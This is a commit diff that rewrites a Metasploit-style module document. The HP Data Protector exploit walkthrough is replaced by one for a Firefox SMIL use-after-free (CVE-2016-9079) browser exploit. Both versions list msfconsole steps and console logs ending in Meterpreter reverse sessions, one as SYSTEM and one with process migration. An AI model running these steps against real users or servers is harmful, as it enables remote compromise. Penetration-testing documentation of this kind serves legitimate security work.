Skip to content

Commit b6d93c0

Browse files
committed
actually save the correct module doc
1 parent 0eb5342 commit b6d93c0

File tree

1 file changed

+31
-58
lines changed

1 file changed

+31
-58
lines changed
Lines changed: 31 additions & 58 deletions
Original file line numberDiff line numberDiff line change
@@ -1,75 +1,48 @@
1-
HP Data Protector is an automated backup and recovery software for single-server to enterprise
2-
environments. It provides cross-platform, online backup of data for Microsoft Windows, Unix,
3-
and Linux operating systems.
4-
5-
While the server is using Encrypted Control Communication, HP Data Protector allows a remote
6-
attacker to gain access without authentication, and gain arbitrary code execution under the
7-
context of SYSTEM.
1+
Mozilla Firefox is a free, open-source web browser developed and maintained by the Mozilla Foundation. Multiple versions are affected by a use-after-free vulnerability, detailed by CVE 2016-9079, that can result in arbitrary remote code execution.
82

93

104
## Vulnerable Application
115

12-
HP Data Protector versions 7, 8, and 9 are known to be affected.
13-
14-
hp_dataprotector_encrypted_comms was specifically tested against version 9.0.0 on Windows 2008.
15-
16-
## Verification Steps
17-
18-
**Installing HP Data Protector**
19-
20-
Before installing HP Data Protector, a Windows domain controller is needed. This exploit was tested
21-
against [a Windows Server 2008 R2 SP1 domain controller](https://www.youtube.com/watch?v=Buj9oEgbRt8).
22-
23-
After setting up the domain controller, double-click on the HP Data Protector installer, and you
24-
should see this screen:
25-
26-
![screen_1](https://cloud.githubusercontent.com/assets/13082457/15794665/99a86238-29e4-11e6-8ccd-0e09b0c8a693.png)
6+
The vulnerability is present in all releases of Mozilla Firefox prior to 50.0.2
277

28-
Click on **Install Data Protector**. And then the installer should ask you which installation type:
8+
Firefox 38 through 41 were specifically chosen as targets for this module, though support for more releases is planned.
299

30-
![screen_2](https://cloud.githubusercontent.com/assets/13082457/15794701/de31d07e-29e4-11e6-9410-0b88abe77afe.png)
10+
## Usage
3111

32-
Make sure to select **Cell Manager**, and click **Next**. Use all default settings.
12+
# UsePostHTML module option
3313

34-
**Enabling Encrypted Communication**
14+
The module includes an option named UsePostHTML which is turned off by default. Setting this option to true will result in the module sending an HTML page to the target to be rendered after successful exploitation. This can be useful in convincing the target that they have arrived at a legitimate, benign website. If desired, please edit $datadirectory/exploits/firefox_smil_uaf/post.html to suit your needs. The included example file more than likely won't be suitable for your purposes.
3515

36-
After the Setup Wizard is finished, we need to enable encrypted communication. First, open the
37-
Data Protector GUI:
38-
39-
![screen_3](https://cloud.githubusercontent.com/assets/1170914/15845344/d3a84ee4-2c37-11e6-821d-fe8002c94686.png)
40-
41-
Click on **Clients**, and the local client from the tree. You should see the **Connection** tab on the
42-
right, click on that.
43-
44-
![screen_4](https://cloud.githubusercontent.com/assets/1170914/15845351/df9929f8-2c37-11e6-9d82-8c519c030a5f.png)
45-
46-
Under the Connection tab, there should be an **Encrypted control communication** checkbox, make
47-
sure that is checked. And then click **Apply**
48-
49-
**Using hp_dataprotector_encrypted_comms**
50-
51-
After the encrypted communication is enabled, you are ready to use
52-
hp_dataprotector_encrypted_comms. Here is what you do:
16+
**Using firefox_smil_uaf**
5317

5418
1. Start msfconsole
55-
2. Do: ```use exploit/windows/misc/hp_dataprotector_encrypted_comms```
56-
3. Do: ```set RHOST [IP ADDRESS]```
19+
2. Do: ```use exploit/windows/browser/firefox_smil_uaf```
20+
3. Do: ```set payload [PREFERRED PAYLOAD]
5721
4. Do: ```set PAYLOAD [PAYLOAD NAME]```
58-
5. Set other options as needed
59-
6. Do: ```exploit```, and you should receive a session like the following:
22+
5. Set payload options as needed
23+
6. Do: ```run```, and have a target browse to the generated URL
24+
7. Once a vulnerable target connects, you should receive a session like this:
6025

6126
```
62-
msf exploit(hp_dataprotector_encrypted_comms) > run
63-
64-
[*] Started reverse TCP handler on 172.16.23.1:4444
65-
[*] 172.16.23.173:5555 - Initiating connection
66-
[*] 172.16.23.173:5555 - Establishing encrypted channel
67-
[*] 172.16.23.173:5555 - Sending payload
68-
[*] 172.16.23.173:5555 - Waiting for payload execution (this can take up to 30 seconds or so)
69-
[*] Sending stage (957999 bytes) to 172.16.23.173
70-
[*] Meterpreter session 1 opened (172.16.23.1:4444 -> 172.16.23.173:49304) at 2016-06-06 22:16:54 -0500
27+
[*] Exploit running as background job.
28+
29+
[*] Started reverse TCP handler on 192.168.79.132:6789
30+
[*] Using URL: http://192.168.79.132:4567/lol
31+
[*] Server started.
32+
msf exploit(firefox_smil_uaf) > [*] 192.168.79.184 firefox_smil_uaf - Got request: /lol/
33+
[*] 192.168.79.184 firefox_smil_uaf - From: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
34+
[*] 192.168.79.184 firefox_smil_uaf - Sending exploit HTML ...
35+
[*] 192.168.79.184 firefox_smil_uaf - Got request: /lol/worker.js
36+
[*] 192.168.79.184 firefox_smil_uaf - From: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
37+
[*] 192.168.79.184 firefox_smil_uaf - Sending worker thread Javascript ...
38+
[*] Sending stage (957487 bytes) to 192.168.79.184
39+
[*] Meterpreter session 1 opened (192.168.79.132:6789 -> 192.168.79.184:52341) at 2017-01-20 11:25:38 -0600
40+
[*] Session ID 1 (192.168.79.132:6789 -> 192.168.79.184:52341) processing InitialAutoRunScript 'migrate -f'
41+
[*] Running module against WIN-UTRINKNPT3D
42+
[*] Current server process: firefox.exe (1448)
43+
[*] Spawning notepad.exe process to migrate to
44+
[+] Migrating to 2572
45+
[+] Successfully migrated to process 2572
7146
72-
meterpreter > getuid
73-
Server username: NT AUTHORITY\SYSTEM
7447
```
7548

0 commit comments

Comments
 (0)